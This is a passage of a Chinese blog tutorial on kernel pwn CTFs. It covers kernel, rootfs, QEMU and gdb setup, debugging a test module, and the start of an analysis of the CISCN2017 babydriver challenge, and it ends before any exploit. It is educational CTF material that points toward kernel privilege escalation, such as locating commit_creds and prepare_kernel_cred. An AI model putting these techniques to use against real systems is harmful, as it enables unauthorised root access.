Kernel pwn CTF 入门

2021-10-02

字数统计: 15.2k | 阅读时长≈ 69 分钟

一、简介

内核 CTF 入门，主要参考 CTF-Wiki。

二、环境配置

调试内核需要一个优秀的 gdb 插件，这里选用 gef。

根据其他师傅描述，peda 和 pwndbg 在调试内核时会有很多玄学问题。
1
2
3
pip3 install capstone unicorn keystone-engine ropper
git clone https://github.com/hugsy/gef.git
echo source `pwd`/gef/gef.py >> ~/.gdbinit

去清华源下载 Linux kernel 压缩包并解压：

1
2
3

curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.9.8.tar.xz
unxz linux-5.9.8.tar.xz
tar -xf linux-5.9.8.tar

进入项目文件夹，进行 makefile 配置
1
2
cd linux-5.9.8
make menuconfig
在其中勾选
- Kernel hacking -> Compile-time checks and compiler options -> Compile the kernel with debug info
- Kernel hacking -> Generic Kernel Debugging Instruments -> KGDB: kernel debugger
之后保存配置并退出
开始编译内核（默认 32 位）
1
make -j 8 bzImage
不推荐直接 make -j 8，因为它会编译很多很多大概率用不上的东西。

这里有些小坑：
- 缺失依赖项。
  
  解决方法：根据 make 的报错信息来安装依赖项。
  1
  sudo apt-get install libelf-dev
- make[1]: *** No rule to make target 'debian/certs/debian-uefi-certs.pem', needed by 'certs/x509_certificate_list'. Stop.
  
  解决方法：将 .config 中的 CONFIG_SYSTEM_TRUSTED_KEYS 内容置空，然后重新 make。
  1
  2
  3
  4
  #
  # Certificates for signature checking
  #
  CONFIG_SYSTEM_TRUSTED_KEYS="" # 置空, 不要删除当前条目
等出现了以下信息后则编译完成：
1
2
3
4
Setup is 15420 bytes (padded to 15872 bytes).
System is 5520 kB
CRC 70701790
Kernel: arch/x86/boot/bzImage is ready (#2)

最后在启动内核前，先构建一个文件系统，否则内核会因为没有文件系统而报错：

1	Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0)

首先下载一下 busybox 源代码：

1 2	wget https://busybox.net/downloads/busybox-1.34.1.tar.bz2 tar -jxf busybox-1.34.1.tar.bz2

之后配置 makefile：

1
2
3

cd busybox-1.34.1
make menuconfig
make -j 8

在 menuconfig 页面中，

Setttings 选中 Build static binary (no shared libs), 使其编译成静态链接的文件（因为 kernel 不提供 libc)

需要注意的是，静态编译与链接需要额外安装一个依赖项 glibc-static。使用以下命令安装：
1
2
3
4
# redhat/centos系列安装:
sudo yum install glibc-static
# debian/ubuntu系列安装
sudo apt-get install libc6-dev
在 Linux System Utilities 中取消选中 Support mounting NFS file systems on Linux < 2.6.23 (NEW)

当前版本默认没有选中该项，因此可以跳过。

编译完成后，使用 make install命令，将生成文件夹_install，该目录将成为我们的 rootfs。

接下来在 _install 文件夹下执行以创建一系列文件：

1	mkdir -p proc sys dev etc/init.d

之后，在 rootfs 下（即 _install 文件夹下）编写以下 init 挂载脚本：

#!/bin/sh
echo "INIT SCRIPT"
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
setsid /bin/cttyhack setuidgid 1000 /bin/sh

最后设置 init 脚本的权限，并将 rootfs 打包：

chmod +x ./init
# 打包命令
find . | cpio -o --format=newc > ../../rootfs.img
# 解包命令
# cpio -idmv < rootfs.img

busybox的编译与安装在构建 rootfs 中不是必须的，但还是强烈建议构建 busybox，因为它提供了非常多的有用工具来辅助使用 kernel。

使用 qemu 启动内核。以下是 CTF wiki 推荐的启动参数：

#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -nographic \
    -kernel ./arch/x86/boot/bzImage \
    -initrd  ./rootfs.img \
    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr" \
    -smp cores=2,threads=1 \
    -cpu kvm64

本着减少参数设置的目的，这是笔者的启动参数：

qemu-system-x86_64 \
  -kernel ./arch/x86/boot/bzImage \
  -initrd ./rootfs.img \
  -append "nokaslr"

减少启动的参数个数，可以让我们在入门时，暂时屏蔽掉一些不必要的细节。

这里只设置了三个参数，其中：

-kernel 指定内核镜像文件 bzImage 路径

-initrd 设置内核启动的内存文件系统

-append "nokaslr" 关闭 Kernel ALSR 以便于调试内核

注意：nokaslr 可 千万千万千万别打成 nokalsr 了。就因为这个我调试了一个下午的 kernel…

是的 CTF Wiki 上的 nokaslr 也是错的，它打成了 nokalsr （xs）

启动好后就可以使用内置的 shell 了。

三、内核驱动的编写与调试

1. 构建过程

这里我们在 linux kernel 项目包下新建了一个文件夹：

1	linux-5.9.8 $ mkdir mydrivers

之后在该文件夹下放入一个驱动代码ko_test.c，代码照搬的 CTF-wiki：

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
MODULE_LICENSE("Dual BSD/GPL");
static int ko_test_init(void) 
{
    printk("This is a test ko!\n");
    return 0;
}
static void ko_test_exit(void) 
{
    printk("Bye Bye~\n");
}
module_init(ko_test_init);
module_exit(ko_test_exit);

代码编写完成后，放入一个 Makefile文件：

# 指定声称哪些 内核模块
obj-m += ko_test.o

# 指定内核项目路径
KDIR =/usr/class/kernel_pwn/linux-5.9.8

all:
        # -C 参数指定进入内核项目路径
        # -M 指定驱动源码的环境，使 Makefile 在构建模块之前返回到 驱动源码 目录，并在该目录中生成驱动模块
        $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
        rm -rf *.o *.ko *.mod.* *.symvers *.order

注意点：
Makefile 文件名中的首字母 M 一定是大写，否则会报以下错误：
1
2
scripts/Makefile.build:44: /usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile: No such file or directory
make[2]: *** No rule to make target '/usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile'.  Stop.
Makefile 中 obj-m 要与刚刚的驱动代码文件名所对应，否则会报以下错误：
1
make[2]: *** No rule to make target '/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.o', needed by '/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.mod'.  Stop.
如果make时遇到以下错误：
1
makefile:6: *** missing separator.  Stop.
则使用 vim 打开 Makefile，键入 i 以进入输入模式，然后替换掉 make 命令前的前导空格为 tab，最后键入 :wq 保存修改。

最后使用 make 即可编译驱动。完成后的目录内容如下所示：

这里我们只关注 ko_test.ko。

$ tree                  
.
├── ko_test.c
├── ko_test.ko
├── ko_test.mod
├── ko_test.mod.c
├── ko_test.mod.o
├── ko_test.o
├── Makefile
├── modules.order
└── Module.symvers

0 directories, 9 files

2. 运行过程

将新编译出来的 *.ko 文件复制进 rootfs 文件夹（busybox-1.34.1/_install）下，

之后修改 busybox-1.34.1/_install/init 脚本中的内容：

这里需要提权 /bin/sh，目的是为了使用 root 权限启动 /bin/sh，使得拥有执行 dmesg 命令的权限。

#!/bin/sh
echo "INIT SCRIPT"
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
+ insmod /ko_test.ko # 挂载内核模块
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
- setsid /bin/cttyhack setuidgid 1000 /bin/sh
+ setsid /bin/cttyhack setuidgid 0 /bin/sh # 修改 uid gid 为 0 以提权 /bin/sh 至 root。
+ poweroff -f # 设置 shell 退出后则关闭机器

重新打包 rootfs 并运行 qemu，之后键入 dmesg 命令即可看到 ko_test 模块已被成功加载：

正常情况下，执行 qemu 会弹出一个小框 GUI。若想像上图一样将启动的界面变成当前终端，则需在 qemu 启动时额外指定参数：

-nographic

-append "console=ttyS0"

3. 调试过程

a. attach qemu

调试时最好使用 root 权限执行 /bin/sh，相关修改方法已经在上面说明，此处暂且不表。

在启动 qemu 时，额外指定参数 -gdb tcp::1234 （或者等价的-s），之后 qemu 将做好 gdb attach 的准备。如果希望 qemu 启动后立即挂起，则必须附带 -S 参数。

同时，调试内核时，为了加载 vmlinux 符号表，必须额外指定 -append "nokaslr"以关闭 kernel ASLR。这样符号表才能正确的对应至内存中的指定位置，否则将无法给目标函数下断点。

qemu启动后，必须另起一个终端，键入 gdb -q -ex "target remote localhost:1234"，即可 attach 至 qemu上。

gdb attach 上 qemu 后，可以加载 vmlinux 符号表、给特定函数下断点，并输入 continue 以执行至目标函数处。

# qemu 指定 -S 参数后挂起，此时在gdb键入以下命令
gef> add-symbol-file vmlinux
gef> b start_kernel
gef> continue

[Breakpoint 1, start_kernel () at init/main.c:837]
......

对于内核中的各个符号来说，我们也可以通过以下命令来查看一些符号在内存中的加载地址：

# grep <symbol_name> /proc/kalsyms
grep prepare_kernel_cred  /proc/kallsyms
grep commit_creds  /proc/kallsyms
grep ko_test_init  /proc/kallsyms

坑点1：之前笔者编写了以下 shell 脚本：
1
2
3
4
5
6
# 其他设置
[...]
# **后台** 启动 qemu
qemu-system-x86_64 [other args] &
# 直接在当前终端打开 GDB
gdb -q -ex "target remote localhost:1234"
但在执行脚本时，当笔者在 GDB 中键入 Ctrl+C 时， SIGINT 信号将直接终止 qemu 而不是挂起内部的 kernel。因此，gdb必须在另一个终端启动才可以正常处理 Ctrl+C。

正确的脚本如下：
1
2
3
4
5
6
# 其他设置
[...]
# **后台** 启动 qemu
qemu-system-x86_64 [other args] &
# 开启新终端，在新终端中打开 GDB
gnome-terminal -e 'gdb -q -ex "target remote localhost:1234"'

坑点2：对于 gdb gef 插件来说，最好不要使用常规的target remote localhost:1234语句（无需root权限）来连接远程，否则会报以下错误：

gef➤  target remote localhost:1234
Remote debugging using localhost:1234
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0x000000000000fff0 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────── registers ────────────────────────────────────
[!] Command 'context' failed to execute properly, reason: 'NoneType' object has no attribute 'all_registers'

与之相对的，使用效果更好的 gef-remote 命令（需要root权限）连接 qemu：

1
2
3

# 一定要提前指定架构
set architecture i386:x86-64
gef-remote --qemu-mode localhost:1234

坑点3：如果 qemu 断在 start_kernel时 gef 报错：

1	[!] Command 'context' failed to execute properly, reason: max() arg is an empty sequence

直接单步 ni 一下即可。

b. attach drivers

1) 常规步骤

首先，将目标驱动加载进内核中：

1	insmod <driver_module_name>

之后，通过以下命令查看 qemu 中内核驱动的 text 段的装载基地址：

# 查看装载驱动
lsmod
# 获取驱动加载的基地址
grep <target_module_name> /proc/modules

在 gdb 窗口中，键入以下命令以加载调试符号：

1	add-symbol-file mydrivers/ko_test.ko <ko_test_base_addr> [-s <section1_name> <section1_addr>] ...

注，与 vmlinux 不同，使用 add-symbol-file 加载内核模块符号时，必须指定内核模块的 text 段基地址。

因为内核位于众所周知的虚拟地址（该地址与 vmlinux elf 文件的加载地址相同），但内核模块只是一个存档，不存在有效加载地址，只能等到内核加载器分配内存并决定在哪里加载此模块的每个可加载部分。因此在加载内核模块前，我们无法得知内核模块将会加载到哪块内存上。故将符号文件加载进 gdb 时，我们必须尽可能显式指定每个 section 的地址。

需要注意的是，加载符号文件时，越多指定每个 section 的地址越好。否则如果只单独指定了 .text 段的基地址，则有可能在给函数下断点时断不下来，非常影响调试。

如何查看目标内核模块的各个 section 加载首地址呢？请执行以下命令：

1	grep "0x" /sys/module/ko_test/sections/.*

2) 例子

一个小小例子：调试 ko_test.ko 的步骤如下：

首先在 qemu 中的 kernel shell 执行以下命令

# 首先装载 ko_test 进内核中
insmod /ko_test.ko
# 查看当前 ko_test 装载的地址
grep ko_test /proc/modules
grep "0x" /sys/module/ko_test/sections/.*

输出如下：

记录下这些地址，之后进入 gdb 中，先按下 Ctrl+C 断下 kernel，然后键入以下命令：

# 将对应符号加载至该地址处
add-symbol-file mydrivers/ko_test.ko  0xffffffffc0002000 \
                    -s .rodata.str1.1 0xffffffffc000304c \
                    -s .symtab        0xffffffffc0007000 \
                    -s .text.unlikely 0xffffffffc0002000
# 下断点
b ko_test_init
b ko_test_exit
# 使其继续执行
continue

最后回到 qemu 中，在 kernel shell 中执行以下命令：
1
2
# 卸载 ko_test
rmmod ko_tes
此时 gdb 会断到 ko_test_exit 中：

如果在卸载了ko_test后，又重新加载 ko_test，
1
insmod ko_test
则 gdb 会立即断到 ko_test_init 中：

这可能是因为指定了 nokaslr，使得相同驱动多次加载的基地址是一致的。

上面调试 kernel module 的 init 函数方法算是一个小 trick，它利用了 noaslr 环境下相同驱动重新加载的基地址一致 的原理来下断。但最为正确的调试 init 函数的方式，还是得跟踪 do_init_module 函数的控制流来获取基地址。以下是一系列相关操作步骤：

跟踪 do_init_module 函数是因为它在 load_module 函数中被调用。load_module函数将在完成大量的内存加载工作后，最后进入 do_init_module 函数中执行内核模块的 init 函数，并在其中进行善后工作。

load_module函数将被作为 SYSCALL 函数的 init_module调用。

首先让 kernel 跑飞，等到 kernel 加载完成，shell 界面显示后，gdb 按下 ctrl + C 断下，给 do_init_module函数下断。该函数的前半部分将会执行内核模块的 init 函数：

/*
 * This is where the real work happens.
 *
 * Keep it uninlined to provide a reliable breakpoint target, e.g. for the gdb
 * helper command 'lx-symbols'.
 */
static noinline int do_init_module(struct module *mod)
{
  [...]
  /* Start the module */
  if (mod->init != NULL)
    ret = do_one_initcall(mod->init);   // <- 此处执行 ko_test_init 函数
  if (ret < 0) {
    goto fail_free_freeinit;
  }
  [...]
}

gdb 键入 continue 再让 kernel 跑飞。之后kernel shell 中输入 insmod /ko_test.ko装载内核模块，此时gdb会断下。在 gdb 中查看 mod->init 成员即可查看到 kernel module init 函数的首地址。
要想看到当前 kernel module 的全部 section 地址，可以在 gdb 中键入以下命令
1
2
3
4
# 查看当前 module 的 sections 个数
p mod->sect_attrs->nsections
# 查看第 3 个 section 信息
p mod->sect_attrs->attrs[2]
有了当前内核模块的全部 section 名称与基地址后，就可以按照之前的方法来加载符号文件了。

c. 启动脚本

配环境真是一件麻烦到极点的事情，不过目前就到此为止了 :)

笔者将一系列启动命令整合成了一个 shell 脚本，方便一键运行：

#! /bin/bash

# 判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode
user=$(env | grep "^USER" | cut -d "=" -f 2)
if [ "$user" != "root"  ]
  then
    echo "请使用 root 权限执行"
    exit
fi

# 复制驱动至 rootfs
cp ./mydrivers/*.ko busybox-1.34.1/_install

# 构建 rootfs
pushd busybox-1.34.1/_install
find . | cpio -o --format=newc > ../../rootfs.img
popd

# 启动 qemu
qemu-system-x86_64 \
    -kernel ./arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "nokaslr" \
    -s  \
    -S&

    # -s ： 等价于 -gdb tcp::1234， 指定 qemu 的调试链接
    # -S ：指定 qemu 启动后立即挂起

    # -nographic                # 关闭 QEMU 图形界面
    # -append "console=ttyS0"   # 和 -nographic 一起使用，启动的界面就变成了当前终端

gnome-terminal -e 'gdb -x mygdbinit'

gdbinit 内容如下：

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

b start_kernel
c

四、小试牛刀

这里选用 CISCN2017_babydriver 作为笔者入门的第一题。之所以选用这一题是因为网上资料较多，方便学习。

1. 题目附件

题目附件可在此处下载。

题目给了三个文件，分别是：

boot.sh 启动脚本
bzImage 内核启动文件
rootfs.cpio 根文件系统镜像

2. 尝试执行

初始时，直接解压 babydriver.tar 并运行启动脚本：

# 解压
mkdir babydriver
tar -xf babydriver.tar -C babydriver
# 启动
cd babydriver 
./boot.sh

但 KVM 报错，其报错信息如下所示：

1 2	Could not access KVM kernel module: No such file or directory qemu-system-x86_64: failed to initialize kvm: No such file or directory

使用以下命令查看当前 linux in vmware 支不支持虚拟化，发现输出为空，即不支持。

1	egrep '^flags.*(vmx\|svm)' /proc/cpuinfo

检查了一下物理机的 Virtualization Settings, 已经全部是打开了的。再检查以下 VMware 的CPU配置，发现没有勾选 虚拟化 Intel VT-x/EPT 或 AMD-V/RVI。

勾选后重新启动 linux 虚拟机，提示此平台不支持虚拟化的 Intel VT-x/EPT…

经过一番百度，发现是 Hyper-V 没有禁用彻底。彻底禁用的操作如下：

控制面板—程序——打开或关闭Windows功能，取消勾选Hyper-V，确定禁用Hyper-V服务
管理员权限打开 cmd，执行 bcdedit /set hypervisorlaunchtype off

若想重新启用，则执行 bcdedit /set hypervisorlaunchtype auto
重启计算机

之后再启动 linux in Vmware，其内部的 kvm 便可以正常执行了。

3. 题目分析

a. 目的

查看一下根目录的 /init 文件，不难看出这题需要我们进行内核提权，只有提权后才可以查看 flag。

#!/bin/sh
 
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag                      # flag 被设置为只有 root 可读
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko   # 加载漏洞驱动
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0  -f

b. 获取目标内核模块

在提权之前，我们需要先把加载进内核的驱动 dump 出来，这个驱动大概率是一个存在漏洞的驱动。

首先使用 file 命令查看一下 rootfs.cpio 的文件格式：

1 2	$ file rootfs.cpio rootfs.cpio: gzip compressed data, last modified: Tue Jul 4 08:39:15 2017, max compression, from Unix, original size modulo 2^32 2844672

可以看到是一个 gzip 格式的文件，因此我们需要给该文件改一下名称，否则 gunzip 将无法识别文件后缀。之后就是解压 gzip + 解包 cpio 的操作：

1 2	mv rootfs.cpio rootfs.cpio.gz gunzip rootfs.cpio.gz

解压之后的文件便是正常的 CPIO 格式：

1 2	$ file rootfs.cpio rootfs.cpio: ASCII cpio archive (SVR4 with no CRC)

使用常规方式给 CPIO 解包即可：

1	cpio -idmv < rootfs.cpio

解包完成后，即可在/lib/modules/4.4.72/babydriver.ko下找到目标驱动。

c. 查看保护

首先是驱动程序保护：

$ checksec babydriver.ko
[*] '/usr/class/kernel_pwn/CISCN2017-babydriver/babydriver/babydriver.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

可以看到这里只开启了 NX 保护。

接着再看看 qemu 启动参数，发现启动了 smep 保护。

#!/bin/bash

qemu-system-x86_64 \
    -initrd rootfs.cpio \
    -kernel bzImage \
    -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
    -enable-kvm \
    -monitor /dev/null \
    -m 64M \
    --nographic  \
    -smp cores=1,threads=1 \
    -cpu kvm64,+smep      # <- 启用 +smep 保护

SMEP（Supervisor Mode Execution Protection 管理模式执行保护）：禁止CPU处于 ring0 模式时执行用户空间代码。

还有一个比较相近的保护措施是 SMAP（Superivisor Mode Access Protection 管理模式访问保护）：禁止内核CPU访问用户空间的数据。

注意到 没有启动 kaslr。

d. 代码分析

第一次接触内核题，代码什么的当然需要理清楚了。这里我们一一把驱动函数代码分析过去。

1) babydriver_init

1.1) 关键代码

先上代码，这里重点关注红框框住的部分（其余部分是异常处理）

简单精简一下，实际关键代码如下所示：

alloc_chrdev_region(&babydev_no, 0, 1, "babydev");

cdev_init(&cdev_0, &fops);
cdev_0.owner = &_this_module;

cdev_add(&cdev_0, babydev_no, 1);

babydev_class = _class_create(&_this_module, "babydev", &babydev_no);

device_create(babydev_class, 0, babydev_no, 0, "babydev");

在解释上面的代码之前，我们先来简单学习一下设备文件的相关知识。

1.2) 设备号

对于所有设备文件来说，一共分为三种，分别是：

字符设备（ char device），例如控制台
块设备（block device），例如文件系统
网络设备（network device），例如网卡

设备文件可以通过设备文件名来访问，通常位于 /dev 目录下。ls -a 出来的第一个字符即说明了当前设备文件的类型：

# c 表示字符设备
crw-rw-rw-   1 root tty       5,   0 Oct  3 15:03 0
# l 表示符号链接
lrwxrwxrwx   1 root root          15 Oct  2 23:43 stdout -> /proc/self/fd/1
# - 表示常规文件
-rw-rw-r--  1 Kiprey Kiprey  203792 Jun 16  2017 babydriver.ko

我们可以在设备文件条目中最后一次修改日期之前看到两个数字(用逗号分隔)，例如上面的 5, 0（这个位置通常显示的是普通文件的文件长度），对于设备文件条目的信息中，形如5,0这样的一对数字，分别是特定设备的主设备号和副设备号。

在传统意义上，主设备号标识与设备相关的驱动程序。例如，/dev/null 和 /dev/zero 都是由驱动1管理的。而多个串行终端（即 ttyX, ttySX）是由驱动4管理的。现代的Linux内核已经支持多个驱动程序共享主设备号，但是我们仍然可以看到，目前大多数设备仍然是按照一个主设备号对应一个驱动程序的方式来组织的。

内核使用副设备号来确定引用的是哪个设备，但副设备号的作用仅限于此，内核不会知道更多关于某个特定副设备号的信息。

主设备号和副设备号可同时保存与类型 dev_t 中，而该类型实际上是一个 u32；其中的12位用于保存主设备号，20位用于保存副设备号。

1 2	typedef u32 __kernel_dev_t; typedef __kernel_dev_t dev_t;

在编写驱动程序需要使用主副设备号时，最好不要直接进行位运算操作，而是使用 <linux/kdev_t.h> 头文件中的宏定义操作：

1
2
3

#define MAJOR(dev)    ((dev)>>8)              // 获取主设备号
#define MINOR(dev)    ((dev) & 0xff)          // 获取副设备号
#define MKDEV(ma,mi)  ((ma)<<8 | (mi))        // 从主副设备号中生成一个 dev_t 类型的变量

设备文件相关的内容暂时到此为止，现在回归题目。

首先，babydriver_init 函数将会调用 alloc_chrdev_region 函数。该函数的函数声明如下：

/**
 * alloc_chrdev_region() - register a range of char device numbers
 * @dev: output parameter for first assigned number
 * @baseminor: first of the requested range of minor numbers
 * @count: the number of minor numbers required
 * @name: the name of the associated device or driver
 *
 * Allocates a range of char device numbers.  The major number will be
 * chosen dynamically, and returned (along with the first minor number)
 * in @dev.  Returns zero or a negative error code.
 */
int alloc_chrdev_region(dev_t *dev, unsigned baseminor, unsigned count,
      const char *name)

根据当前函数的调用代码：

1	alloc_chrdev_region(&babydev_no, 0, 1, "babydev");

我们不难看出，babydriver_init 函数尝试向内核申请一个字符设备的新的主设备号，其中副设备号从0开始，设备名称为 babydev，并将申请到的主副设备号存入 babydev_no 全局变量中。

还有一个名为register_chrdev_region的函数，它在调用时需要指定主副设备号的起始值，要求内核在起始值的基础上进行分配，与 alloc_chrdev_region功能相似但又有所不同。

设备号分配完成后，我们需要将其连接到实现设备操作的内部函数。

1.3) 注册字符设备

内核使用 cdev 类型的结构来表示字符设备，因此在操作设备之前，内核必须初始化+注册一个这样的结构体。

注意，一个驱动程序可以分配不止一个设备号，创建不止一个设备。

该函数的执行代码如下：

1	cdev_init(&cdev_0, &fops);

cdev 结构体的初始化函数如下：

/**
 * cdev_init() - initialize a cdev structure
 * @cdev: the structure to initialize
 * @fops: the file_operations for this device
 *
 * Initializes @cdev, remembering @fops, making it ready to add to the
 * system with cdev_add().
 */
void cdev_init(struct cdev *cdev, const struct file_operations *fops)

正如注释中写到，传入的 cdev 指针所对应的 struct cdev 将会被初始化，同时设置该设备的各类操作为传入的 file_operations结构体指针。

file_operations结构体中包含了大量的函数指针：

struct file_operations {
  struct module *owner;
  loff_t (*llseek) (struct file *, loff_t, int);
  ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
  ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
  ssize_t (*read_iter) (struct kiocb *, struct iov_iter *);
  ssize_t (*write_iter) (struct kiocb *, struct iov_iter *);
  int (*iopoll)(struct kiocb *kiocb, bool spin);
  int (*iterate) (struct file *, struct dir_context *);
  int (*iterate_shared) (struct file *, struct dir_context *);
  __poll_t (*poll) (struct file *, struct poll_table_struct *);
  long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
  long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
  int (*mmap) (struct file *, struct vm_area_struct *);
  unsigned long mmap_supported_flags;
  int (*open) (struct inode *, struct file *);
  int (*flush) (struct file *, fl_owner_t id);
  int (*release) (struct inode *, struct file *);
  int (*fsync) (struct file *, loff_t, loff_t, int datasync);
  int (*fasync) (int, struct file *, int);
  int (*lock) (struct file *, int, struct file_lock *);
  ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
  unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
  int (*check_flags)(int);
  int (*flock) (struct file *, int, struct file_lock *);
  ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
  ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
  int (*setlease)(struct file *, long, struct file_lock **, void **);
  long (*fallocate)(struct file *file, int mode, loff_t offset,
        loff_t len);
  void (*show_fdinfo)(struct seq_file *m, struct file *f);
#ifndef CONFIG_MMU
  unsigned (*mmap_capabilities)(struct file *);
#endif
  ssize_t (*copy_file_range)(struct file *, loff_t, struct file *,
      loff_t, size_t, unsigned int);
  loff_t (*remap_file_range)(struct file *file_in, loff_t pos_in,
           struct file *file_out, loff_t pos_out,
           loff_t len, unsigned int remap_flags);
  int (*fadvise)(struct file *, loff_t, loff_t, int);
} __randomize_layout;

但在这道题中我们只会用到其中的一小部分，即 /baby(open|release|read|write|ioctl)/。

struct file_operations 中的 owner 指针是必须指向当前内核模块的指针，可以使用宏定义 THIS_MODULE 来获取该指针。

当 cdev 结构体初始化完成后，最后的一步就是使用 cdev_add 告诉内核该设备的设备号。

1	cdev_add(&cdev_0, babydev_no, 1);

其中，cdev_add 函数声明如下所示：

/**
 * cdev_add() - add a char device to the system
 * @p: the cdev structure for the device
 * @dev: the first device number for which this device is responsible
 * @count: the number of consecutive minor numbers corresponding to this
 *         device
 *
 * cdev_add() adds the device represented by @p to the system, making it
 * live immediately.  A negative error code is returned on failure.
 */
int cdev_add(struct cdev *p, dev_t dev, unsigned count)

需要注意的是，一旦 cdev_add 函数执行完成，则当前 cdev 设备立即处于活动状态，其操作可以立即被内核调用。因此在编写驱动程序时，务必保证在驱动程序完全准备好处理设备上的操作之后，最后再来调用 cdev_add。

1.4) 将设备注册进 sysfs

当驱动模块已经将 cdev 注册进内核后，该函数将会执行以下代码，来将当前设备的设备结点注册进 sysfs 中。

1 2	babydev_class = class_create(THIS_MODULE, "babydev"); device_create(babydev_class, 0, babydev_no, 0, "babydev");

其中，函数 class_create 和 device_create 的声明如下：

/* This is a #define to keep the compiler from merging different
 * instances of the __key variable */
#define class_create(owner, name)    \
({            \
  static struct lock_class_key __key;  \
  __class_create(owner, name, &__key);  \
})

/**
 * class_create - create a struct class structure
 * @owner: pointer to the module that is to "own" this struct class
 * @name: pointer to a string for the name of this class.
 * @key: the lock_class_key for this class; used by mutex lock debugging
 *
 * This is used to create a struct class pointer that can then be used
 * in calls to device_create().
 *
 * Returns &struct class pointer on success, or ERR_PTR() on error.
 *
 * Note, the pointer created here is to be destroyed when finished by
 * making a call to class_destroy().
 */
struct class *__class_create(struct module *owner, const char *name,
           struct lock_class_key *key)
    
/**
 * device_create - creates a device and registers it with sysfs
 * @class: pointer to the struct class that this device should be registered to
 * @parent: pointer to the parent struct device of this new device, if any
 * @devt: the dev_t for the char device to be added
 * @drvdata: the data to be added to the device for callbacks
 * @fmt: string for the device's name
 *
 * This function can be used by char device classes.  A struct device
 * will be created in sysfs, registered to the specified class.
 *
 * A "dev" file will be created, showing the dev_t for the device, if
 * the dev_t is not 0,0.
 * If a pointer to a parent struct device is passed in, the newly created
 * struct device will be a child of that device in sysfs.
 * The pointer to the struct device will be returned from the call.
 * Any further sysfs files that might be required can be created using this
 * pointer.
 *
 * Returns &struct device pointer on success, or ERR_PTR() on error.
 *
 * Note: the struct class passed to this function must have previously
 * been created with a call to class_create().
 */
struct device *device_create(struct class *class, struct device *parent,
           dev_t devt, void *drvdata, const char *fmt, ...)

初始时，init 函数通过调用 class_create 函数创建一个 class 类型的类，创建好后的类存放于sysfs下面，可以在 /sys/class中找到。

之后函数调用 device_create 函数，动态建立逻辑设备，对新逻辑设备进行初始化；同时还将其与第一个参数所对应的逻辑类相关联，并将此逻辑设备加到linux内核系统的设备驱动程序模型中。这样，函数会自动在 /sys/devices/virtual 目录下创建新的逻辑设备目录，并在 /dev 目录下创建与逻辑类对应的设备文件。

最终实现效果就是，我们便可以在 /dev 中看到该设备。

1.5 init 函数小结

综上，babydriver_init 函数主要做了几件事：

向内核申请一个空闲的设备号
声明一个 cdev 结构体，初始化并绑定设备号
创建新的 struct class，并将该设备号所对应的设备注册进 sysfs

2) babydriver_exit

理解完 init 函数后，理解 exit 函数的逻辑就相当的简单——把该释放的数据结构全部释放。

void __cdecl babydriver_exit()
{
  device_destroy(babydev_class, babydev_no);
  class_destroy(babydev_class);
  cdev_del(&cdev_0);
  unregister_chrdev_region(babydev_no, 1LL);
}

3) babyopen

该函数代码如下：

babyopen 函数在内核中创建了一个 babydev_struct 的结构体，其中包含了一个 device_buf 指针以及一个 device_buf_len成员变量。

需要注意的是，kmem_cache_alloc_trace 函数分配内存的逻辑与 kmalloc类似，笔者怀疑反汇编出来的代码应该是调用 kmalloc 函数优化内敛后的效果：

/**
 * kmalloc - allocate memory
 * @size: how many bytes of memory are required.
 * @flags: the type of memory to allocate.
 *
 * kmalloc is the normal method of allocating memory
 * for objects smaller than page size in the kernel.
 *
 * The allocated object address is aligned to at least ARCH_KMALLOC_MINALIGN
 * bytes. For @size of power of two bytes, the alignment is also guaranteed
 * to be at least to the size.
 *
 * The @flags argument may be one of the GFP flags defined at
 * include/linux/gfp.h and described at
 * :ref:`Documentation/core-api/mm-api.rst <mm-api-gfp-flags>`
 *
 * The recommended usage of the @flags is described at
 * :ref:`Documentation/core-api/memory-allocation.rst <memory_allocation>`
 *
 * Below is a brief outline of the most useful GFP flags
 *
 * %GFP_KERNEL
 *  Allocate normal kernel ram. May sleep.
 *
 * %GFP_NOWAIT
 *  Allocation will not sleep.
 *
 * %GFP_ATOMIC
 *  Allocation will not sleep.  May use emergency pools.
 *
